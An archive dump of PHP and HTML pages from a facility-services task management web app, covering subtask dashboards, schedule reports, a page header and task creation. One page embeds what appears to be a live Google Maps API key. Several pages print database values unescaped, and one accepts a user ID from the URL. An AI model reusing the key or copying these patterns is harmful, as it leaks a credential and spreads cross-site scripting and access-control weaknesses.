$todayIncompleteSubTasks = $todaySubtasksSummary['incomplete']; ?> <div class="main-content"> <div class="container-fluid"> <div class="row grid-layout"> <!-- Ongoing, Completed, Incomplete Subtasks and Chart --> <div class="col-md-8"> <div class="card"> <div class="card-header"> <h3>Overall Subtasks Summary</h3> </div> <div class="card-body"> <div class="row"> <div class="col-md-6"> <div class="widget bg-primary"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Ongoing Subtasks</h6> <h2><?php echo $ongoingSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-box"></i> </div> </div> </div> </div> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?php echo $completedSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-shopping-cart"></i> </div> </div> </div> </div> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?php echo $incompleteSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-inbox"></i> </div> </div> </div> </div> </div> <div class="col-md-6"> <div class="card-body text-center"> <canvas id="subtasksPieChart" style="height: 370px; width: 100%;"></canvas> </div> </div> </div> </div> </div> <!-- Today's Subtasks Summary --> <div class="card"> <div class="card-header"> <h3>Today's Subtasks Summary: <?php echo date('l, F j, Y'); ?></h3> </div> <div class="card-block"> <div class="row"> <div class="col-md-6"> <!-- Total Subtasks --> <div class="widget bg-info"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Total Subtasks to be Completed</h6> <h2><?php echo $todayTotalSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-calendar"></i> </div> </div> </div> </div> <!-- Today's Completed Subtasks --> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?php echo $todayCompletedSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-check-circle"></i> </div> </div> </div> </div> <!-- Today's Incomplete Subtasks --> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?php echo $todayIncompleteSubTasks; ?></h2> </div> <div class="icon"> <i class="ik ik-alert-circle"></i> </div> </div> </div> </div> </div> <!-- Doughnut Chart for Today's Subtasks --> <div class="col-md-6"> <div class="card-block text-center"> <canvas id="todaySubtasksDoughnutChart" style="height: 370px; width: 100%;"></canvas> </div> </div> </div> </div> </div> </div> <!-- Right Column Widgets --> <div class="col-md-4"> <!-- Sub Contractors --> <div class="widget bg-primary"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6> Tasks Added By Me</h6> <h2><?php echo $tasksAddedByMe; ?></h2> </div> <div class="icon"> <i class="ik ik-box"></i> </div> </div> </div> </div> <!-- Services --> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Services</h6> <h2><?php echo $services->count; ?></h2> </div> <div class="icon"> <i class="ik ik-map-pin"></i> </div> </div> </div> </div> <!-- Completed Subtasks Chart --> <div class="card sale-card"> <div class="card-header"> <h3>Completed Subtasks</h3> </div> <div class="card-block"> <div id="subtask-chart" class="chart-shadow" style="height:300px"></div> </div> </div> </div> </div> </div> </div> <script src="https://www.amcharts.com/lib/3/amcharts.js"></script> <script src="https://www.amcharts.com/lib/3/serial.js"></script> <script src="https://www.amcharts.com/lib/3/themes/light.js"></script> <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> <script src="https://canvasjs.com/assets/script/canvasjs.min.js"></script> <script> var chartData = [ <?php foreach ($subtasks as $subtask): ?> { "date": "<?php echo $subtask->completed_at; ?>", "completed_subtasks": <?php echo $subtask->completed_subtasks; ?> }, <?php endforeach; ?> ]; var chart = AmCharts.makeChart("subtask-chart", { "type": "serial", "theme": "light", "dataDateFormat": "YYYY-MM-DD", "precision": 2, "valueAxes": [{ "id": "v1", "position": "left", "autoGridCount": false, "labelFunction": function (value) { return value + " tasks"; } }], "graphs": [{ "id": "g1", "valueAxis": "v1", "bullet": "round", "bulletBorderAlpha": 1, "bulletColor": "#FFFFFF", "bulletSize": 8, "hideBulletsCount": 50, "lineThickness": 3, "lineColor": "#2ed8b6", "title": "Completed Subtasks", "useLineColorForBulletBorder": true, "valueField": "completed_subtasks", "balloonText": "[[title]]<br /><b style='font-size: 130%'>[[value]]</b>" }], "chartCursor": { "pan": true, "valueLineEnabled": true, "valueLineBalloonEnabled": true, "cursorAlpha": 0, "valueLineAlpha": 0.2 }, "categoryField": "date", "categoryAxis": { "parseDates": true, "dashLength": 1, "minorGridEnabled": true }, "legend": { "useGraphSettings": true, "position": "top" }, "balloon": { "borderThickness": 1, "shadowAlpha": 0 }, "dataProvider": chartData }); </script> <script> // Data for the doughnut chart var completedSubTasks = <?php echo $completedSubTasks; ?>; var incompleteSubTasks = <?php echo $incompleteSubTasks; ?>; // Create Doughnut Chart var ctx = document.getElementById('subtasksPieChart').getContext('2d'); var subtasksDoughnutChart = new Chart(ctx, { type: 'doughnut', // Change type to 'doughnut' data: { labels: ['Completed Subtasks', 'Incomplete Subtasks'], datasets: [{ label: 'Subtasks Status', data: [completedSubTasks, incompleteSubTasks], // Data values for doughnut chart backgroundColor: [ '#28a745', // Green color for 'Completed Subtasks' '#fd7e14' // Red color for 'Incomplete Subtasks' ], borderColor: [ '#ffffff', // White border '#ffffff' // White border ], borderWidth: 1 }] }, options: { responsive: true, // Make chart responsive maintainAspectRatio: false, plugins: { legend: { display: true, // Show legend position: 'bottom' // Position of the legend }, } } }); </script> <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> <script> // Data for the doughnut chart for today's subtasks var todayCompletedSubTasks = <?php echo $todayCompletedSubTasks; ?>; var todayIncompleteSubTasks = <?php echo $todayIncompleteSubTasks; ?>; // Create Doughnut Chart for Today's Subtasks var ctx = document.getElementById('todaySubtasksDoughnutChart').getContext('2d'); var todaySubtasksDoughnutChart = new Chart(ctx, { type: 'doughnut', data: { labels: ['Completed Subtasks', 'Incomplete Subtasks'], datasets: [{ label: 'Today\'s Subtasks Status', data: [todayCompletedSubTasks, todayIncompleteSubTasks], // Data values for doughnut chart backgroundColor: [ '#28a745', // Green for completed '#ffc107' // Yellow for incomplete ], borderColor: [ '#ffffff', // White border '#ffffff' // White border ], borderWidth: 1 }] }, options: { responsive: true, // Make chart responsive maintainAspectRatio: false, plugins: { legend: { display: true, // Show legend position: 'bottom' // Position of the legend }, } } }); </script> <?php include('footer.php'); ?> taskprovider/report_tasksstatusbyschedule.php000064400000033444151676701240016047 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Service/ServiceService.php'; require_once '../../Classes/System.php'; // Create instances of the required services $taskService = new TaskService(); $UserService = new UserService(); $System = new System(); // Create ServiceService instance $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Fetch all schedules for the dropdown $schedules = $taskService->getAllSchedules(); //get schedule id form the url $schedule_id = isset($_GET['schedule_id']) ? $_GET['schedule_id'] : null; // Handle form submission and fetch tasks based on the selected schedule $selectedScheduleId = $System->decryptData($schedule_id); $tasksBySchedule = []; if ($selectedScheduleId) { $tasksBySchedule = $taskService->getTasksBySchedule($selectedScheduleId); } ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Tasks by Schedule</h5> <span>Select a schedule to view tasks</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="#"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks by Schedule</li> </ol> </nav> </div> </div> </div> <!-- Search Form --> <div class="row"> <div class="col-md-12"> <form method="GET" action=""> <div class="form-group"> <label for="schedule_id">Select Schedule:</label> <select name="schedule_id" id="schedule_id" class="form-control"> <option value="">-- Select Schedule --</option> <?php foreach ($schedules as $schedule) { ?> <option value="<?= htmlspecialchars($System->encryptData($schedule->id)); ?>" <?= ($selectedScheduleId == $schedule->id) ? 'selected' : '' ?>> <?= htmlspecialchars($schedule->schedule_name); ?> </option> <?php } ?> </select> </div> <button type="submit" class="btn btn-primary">Search</button> </form> </div> </div> <!-- Display Tasks Table --> <div class="row mt-4"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <div class="dt-responsive"> <div class="row mb-3"> <div class="col-md-2"> <label for="filter_Service_Name" class="form-label">Filter by Service Name:</label> <input type="text" class="form-control" id="filter_Service_Name"> </div> <div class="col-md-2"> <label for="filter_region" class="form-label">Filter by Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> <div class="col-md-2"> <label for="filter_status" class="form-label">Filter by Status:</label> <select name="filter_status" id="filter_status" class="form-control"> <option value="">-- Select Status --</option> <option value="Assigned.">Assigned</option> <option value="Not Assigned">Not Assigned</option> </select> </div> <div class="col-md-2"> <label for="filter_finished" class="form-label">Filter by Finished:</label> <select name="filter_finished" id="filter_finished" class="form-control"> <option value="">-- Select Finished --</option> <option value="Finished.">Finished</option> <option value="Not Finished">Not Finished</option> </select> </div> <div class="col-md-3"> <label for="reset_filters" class="form-label"> </label> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <table class="table" id="tasks_by_schedule_table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Status</th> <th>Finished</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasksBySchedule as $task) { ?> <tr> <td><?php echo 'TSK-000'.htmlspecialchars($task->id); ?></td> <td><?= htmlspecialchars($task->service_name); ?></td> <td><?= htmlspecialchars($task->region); ?></td> <td> <?= $task->is_assigned && $task->accepted ? '<label class="badge badge-success">Assigned.</label>' : '<label class="badge badge-warning">Not Assigned</label>'; ?> </td> <td><?php echo($task->finished ? '<label class="badge badge-success">Finished.</label>' : '<label class="badge badge-warning">Not Finished</label>'); ?></td> <td> <a href="viewtask.php?id=<?= $System->encryptData($task->id); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> <script> $(document).ready(function () { // Initialize DataTable var table = $('#tasks_by_schedule_table').DataTable({ // Configure initial settings if needed }); // Function to save filters to localStorage function saveFilters() { var filters = { serviceName: $('#filter_Service_Name').val(), region: $('#filter_region').val(), status: $('#filter_status').val(), finished: $('#filter_finished').val() }; localStorage.setItem('tasksByScheduleTableFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('tasksByScheduleTableFilters')); if (filters) { $('#filter_Service_Name').val(filters.serviceName).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); $('#filter_status').val(filters.status).trigger('change'); $('#filter_finished').val(filters.finished).trigger('change'); } } // Function to reset filters function resetFilters() { $('#filter_Service_Name').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); $('#filter_status').val('').trigger('change'); $('#filter_finished').val('').trigger('change'); localStorage.removeItem('tasksByScheduleTableFilters'); table.search('').columns().search('').draw(); } // Check previous page and apply filters if necessary function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); if (!previousUrl || !previousUrl.includes('viewtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_Service_Name').on('keyup', function () { table.column(1).search(this.value).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(2).search(this.value).draw(); saveFilters(); }); $('#filter_status').on('change', function () { table.column(3).search(this.value).draw(); saveFilters(); }); $('#filter_finished').on('change', function () { table.column(4).search(this.value).draw(); saveFilters(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> </div> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> <script> $(document).ready(function() { $('#tasks_by_schedule_table').DataTable(); }); </script> taskprovider/report_viewsubtasksdaywise.php000064400000035656151676701240015535 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used $TaskProviderId = $_SESSION['user_id']; // Fetch all subtasks grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } // Correctly call the function with the right parameters //$subtasks = $taskService->getAllSubtasksForTaskProviderGroupByDate($startDate, $endDate, $serviceLocationId, $TaskProviderId); $subtasks = $taskService->getAllSubtasksGroupByDate($startDate, $endDate, $serviceLocationId); $CompletedSubtaskcount = 0; $IncompletedSubtaskcount = 0; foreach ($subtasks as $date => $subtaskList) { foreach ($subtaskList as $subtask) { if ($subtask['completed']) { $CompletedSubtaskcount++; } else { $IncompletedSubtaskcount++; } } } ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css" /> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>Assign Tasks to Cleaner</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Banner Section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-footer"> <div class="d-flex"> <div class="col-lg-3 col-md-6 col-sm-12"> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?= $CompletedSubtaskcount; ?></h2> </div> <div class="icon"> <i class="ik ik-shopping-cart"></i> </div> </div> </div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-12"> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?= $IncompletedSubtaskcount; ?></h2> </div> <div class="icon"> <i class="ik ik-inbox"></i> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Date Filter and Today Checkbox --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date" value="<?= htmlspecialchars($startDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date" value="<?= htmlspecialchars($endDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="serviceLocationId">Select a Service Location:</label> <select id="serviceLocationId" name="serviceLocationId" class="form-control select2"> <option value="">All Locations</option> <?php foreach ($services as $service) { $selected = ''; if (isset($_GET['service_location_id']) && $_GET['service_location_id'] == $service->id) { $selected = 'selected'; } echo '<option value="' . htmlspecialchars($service->id) . '" ' . $selected . '>' . htmlspecialchars($service->name) . '</option>'; } ?> </select> </div> </div> <div class="col-md-3 d-flex align-items-center"> <div class="form-check form-check-inline"> <input class="form-check-input" type="checkbox" id="todayCheckbox" value="today" <?= ($startDate == date('Y-m-d') && $endDate == date('Y-m-d')) ? 'checked' : '' ?>> <label class="form-check-label" for="todayCheckbox">Today</label> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <?php foreach ($subtasks as $date => $subtaskList) { ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?php if ($date == date('Y-m-d')) { echo 'Today'; } else if ($date == date('Y-m-d', strtotime('tomorrow'))) { echo 'Tomorrow'; } else { echo date('l, F j, Y', strtotime($date)); } ?></h3> <div class="card-header-right"> <ul class="list-unstyled card-option"> <li><i class="ik ik-chevron-left action-toggle" data-toggle="tooltip" title="Collapse"></i></li> <li><i class="ik ik-minus minimize-card" data-toggle="tooltip" title="Minimize"></i></li> </ul> </div> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="advanced_table_<?php echo strtotime($date); ?>"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Assigned</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <tr> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['assigned'] ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'; ?></td> <td> <?php if ($subtask['ignored']) { echo '<span class="badge badge-warning">Ignored</span>'; } else { echo $subtask['completed'] ? '<span class="badge badge-success">Completed</span>' : '<span class="badge badge-danger">Not Completed</span>'; } ?> </td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <!-- Include jQuery and Bootstrap Datepicker JS --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function() { // Initialize datepickers $('.datepicker').datepicker({ format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true }); // Function to save filters to localStorage function saveFilters() { var filters = { startDate: $('#startDate').val(), endDate: $('#endDate').val(), serviceLocationId: $('#serviceLocationId').val(), todayCheckbox: $('#todayCheckbox').is(':checked') }; localStorage.setItem('dateRangeFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('dateRangeFilters')); if (filters) { $('#startDate').val(filters.startDate); $('#endDate').val(filters.endDate); $('#serviceLocationId').val(filters.serviceLocationId); $('#todayCheckbox').prop('checked', filters.todayCheckbox); } } // Function to reset filters function resetFilters() { $('#startDate').val(''); $('#endDate').val(''); $('#serviceLocationId').val(''); $('#todayCheckbox').prop('checked', false); localStorage.removeItem('dateRangeFilters'); applyDateRangeFilter(); } // Apply date range filter by modifying the URL function applyDateRangeFilter() { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var serviceLocationId = $('#serviceLocationId').val(); var url = window.location.href.split('?')[0] + '?start_date=' + startDate + '&end_date=' + endDate + '&service_location_id=' + serviceLocationId; window.location.href = url; } // Event handler for applyFilter button $('#applyFilter').on('click', function() { saveFilters(); applyDateRangeFilter(); }); // Event handler for todayCheckbox $('#todayCheckbox').on('change', function() { if ($(this).is(':checked')) { var today = '<?= date('Y-m-d') ?>'; $('#startDate').val(today); $('#endDate').val(today); } else { $('#startDate').val(''); $('#endDate').val(''); } saveFilters(); applyDateRangeFilter(); }); // Add reset filters button functionality $('#reset_filters').on('click', function() { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> <?php include('footer.php'); ?> taskprovider/head.php000064400000007664151676701240010721 0ustar00<?php session_start(); require_once '../../Classes/System.php'; $system = new system(); // Check if the user is not logged in or is not an admin if (!$system->isLoggedIn() || !$system->isTaskProvider()) { header('Location: ../login.php'); exit; // Stop further execution } $companyId = $_SESSION['user_id']; ?> <!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title><?php echo isset($pageTitle) ? $pageTitle : "Emera Facility Services"; ?></title> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <script type="text/javascript" charset="utf8" src="https://code.jquery.com/jquery-3.5.1.js"></script> <link rel="icon" href="../../cropped-emera-holdings-favicon-1-32x32.png" type="image/x-icon" /> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,400,600,700,800" rel="stylesheet"> <link rel="stylesheet" href="../../node_modules/bootstrap/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css"> <link rel="stylesheet" href="../../node_modules/ionicons/dist/css/ionicons.min.css"> <link rel="stylesheet" href="../../node_modules/icon-kit/dist/css/iconkit.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../dist/css/theme.min.css"> <link rel="stylesheet" href="../../node_modules/flatpickr/dist/flatpickr.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../node_modules/datatables.net-bs4/css/dataTables.bootstrap4.min.css"> <link rel="stylesheet" href="../../node_modules/tempusdominus-bootstrap-4/build/css/tempusdominus-bootstrap-4.min.css"> <link rel="stylesheet" href="../../node_modules/weather-icons/css/weather-icons.min.css"> <link rel="stylesheet" href="../../node_modules/c3/c3.min.css"> <link rel="stylesheet" href="../../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../../node_modules/owl.carousel/dist/assets/owl.carousel.css"> <link rel="stylesheet" href="../../node_modules/owl.carousel/dist/assets/owl.theme.default.css"> <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.24/css/jquery.dataTables.css"> <link rel="stylesheet" href="../../node_modules/select2/dist/css/select2.min.css"> <script src="../../src/js/vendor/modernizr-2.8.3.min.js"></script> <script src="../../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/flatpickr"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <style> /* Optional: You can style your map container here */ #map { height: 400px; width: 100%; } </style> <script> document.addEventListener('DOMContentLoaded', function () { // Function to log previous page URL from session state // Save current page URL to session state function saveCurrentPageUrl() { var currentUrl = window.location.href; sessionStorage.setItem('previousUrl', currentUrl); } // Call saveCurrentPageUrl when navigating away window.addEventListener('beforeunload', saveCurrentPageUrl); }); </script> </head> <body> <div class="wrapper"> <?php include('header.php'); ?> <div class="page-wrap"> <?php include('sidebar.php'); ?>taskprovider/add_tasks.php000064400000006237151676701240011750 0ustar00<?php // schedule.php session_start(); error_reporting(E_ALL); ini_set('display_errors', 1); require_once '../../Classes/Database.php'; require_once '../../Classes/Schedules.php'; require_once '../../Classes/Task.php'; require_once '../../Service/ScheduleService.php'; require_once '../../Service/TaskService.php'; require_once '../../Service/ServiceService.php'; $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Read the raw POST data $input = file_get_contents('php://input'); $data = json_decode($input, true); // Decode the JSON data into an associative array // Extract schedule name and tasks $scheduleName = isset($data['scheduleName']) ? trim($data['scheduleName']) : ''; $currentUserId = isset($data['currentUserId']) ? trim($data['currentUserId']) : ''; $tasks = isset($data['tasks']) ? $data['tasks'] : []; $now = date('Y-m-d H:i:s'); try { // Create a new schedule $schedule = new Schedules('', $scheduleName, $currentUserId, false, $now, $now); $scheduleService = new ScheduleService(); $schedule_id = $scheduleService->addScheduleRetuenlastinsertedid($schedule); // Check if schedule creation was successful if (!$schedule_id) { echo json_encode(array('error' => 'Failed to add schedule.')); exit; } // Loop through tasks array and add each task foreach ($tasks as $taskData) { $serviceId = isset($taskData['service']) ? trim($taskData['service']) : ''; $frequency = isset($taskData['frequency']) ? trim($taskData['frequency']) : ''; $dates = isset($taskData['dates']) ? $taskData['dates'] : []; // Validate and format dates and times $formattedDates = []; foreach ($dates as $date) { $formattedDates[] = [ 'date' => $date['date'], 'time' => $date['time'] ]; } // Create a new task instance with the formatted dates and times $task = new Task('', $schedule_id, $serviceId, $frequency, json_encode($formattedDates), $currentUserId, $currentUserId, $now, $now, false, null, false, false, false, '', null,0); $taskService = new TaskService(); $task_id = $taskService->addTask($task); // Check if task creation was successful if (!$task_id) { echo json_encode(array('error' => 'Failed to add task.')); exit; } } // If everything is successful, return a success response echo json_encode(array('success' => true, 'message' => 'Tasks added successfully.', 'schedule_id' => $schedule_id)); } catch (Exception $e) { // Handle any exceptions and return an error response echo json_encode(array('error' => $e->getMessage())); } } else { // If the request method is not POST, return an error response echo json_encode(array('error' => 'Invalid request method.')); } ?> taskprovider/viewsubtask.php000064400000033201151676701240012351 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; $System = new System(); $subtaskService = new SubtaskService(); $userService = new UserService(); if (!isset($_GET['id'])) { echo '<p>No subtask ID provided.</p>'; exit; } $subtaskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$subtaskId) { echo '<script> Swal.fire({ title: "Invalid Subtask ID", text: "The URL parameter is invalid. Please go back and try again.", icon: "error", confirmButtonText: "Ok" }).then(() => window.location.href = "viewschedules.php"); </script>'; exit; } $subtask = $subtaskService->getSubtaskById($subtaskId); $users = $userService->getAllUsers(); if($subtask->completed){ $submittedLocation = $subtaskService->getSubtaskLocation($subtaskId); if ($submittedLocation) { $latitude = $submittedLocation->latitude; $longitude = $submittedLocation->longitude; } else { // Handle the case where location is not found $latitude = null; $longitude = null; // Optionally, display an error message or take other actions echo "Location not found for the specified subtask."; } } ?> <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap" async defer></script> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Subtask</h5> <span>View details of a subtask</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="#"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Subtasks</a></li> <li class="breadcrumb-item active" aria-current="page">View Subtask</li> </ol> </nav> </div> </div> <div class="card"> <div class="card-header d-flex justify-content-between"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> <div> </div> </div> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-12"> <table> <tbody> <tr> <td> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $subtask->service_name; ?></h3></td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $subtask->subtask_date ? date('F j, Y', strtotime($subtask->subtask_date)) : 'Not set'; ?></h5></td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <!-- Show time in am or pm --> <td><h5 class="mb-0 fw-500 text-black"><?php echo $subtask->subtask_time ? date('g:i A', strtotime($subtask->subtask_time)) : 'Not set'; ?></h5></td> </tr> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo date('F j, Y', strtotime($subtask->updated_at)); ?></h5></td> </tr> </tbody> </table> </td> <td> <table> <tbody> <tr> <td><i class="ik ik-check-circle icon-large"></i></td> <td> <?php if ($subtask->ignored) { echo '<span class="badge badge-yellow">Ignored</span>'; } else { if ($subtask->completed) { echo '<span class="badge badge-success">Completed</span> '; } else { echo '<span class="badge badge-danger">Not Completed</span>'; } } ?> </td> </tr> <!-- --><?php //if ($subtask->completed): ?> <!-- <tr>--> <!-- <td><i class="ik ik-calendar icon-large"></i></td>--> <!-- <td><h5 class="mb-0 fw-500 text-black">--><?php //echo $subtask->completed_at; ?><!--</h5></td>--> <!-- </tr>--> <!-- --><?php //endif; ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td> <?php if ($subtask->assigned): ?> <span class="badge badge-success">Assigned</span> <?php else: ?> <span class="badge badge-danger">Not assigned</span> <?php endif; ?> </td> </tr> <?php if ($subtask->assigned): ?> <tr> <td><i class="ik ik-file-text icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"> <?php echo $subtask->form_submission_id ? '<a href="../completedsubtaskform.php?id=' . $subtask->form_submission_id . '" target="_blank" >View Submitted Form</a>' : 'Not Submitted'; ?> </h5></td> </tr> <?php if ($subtask->completed && property_exists($subtask, 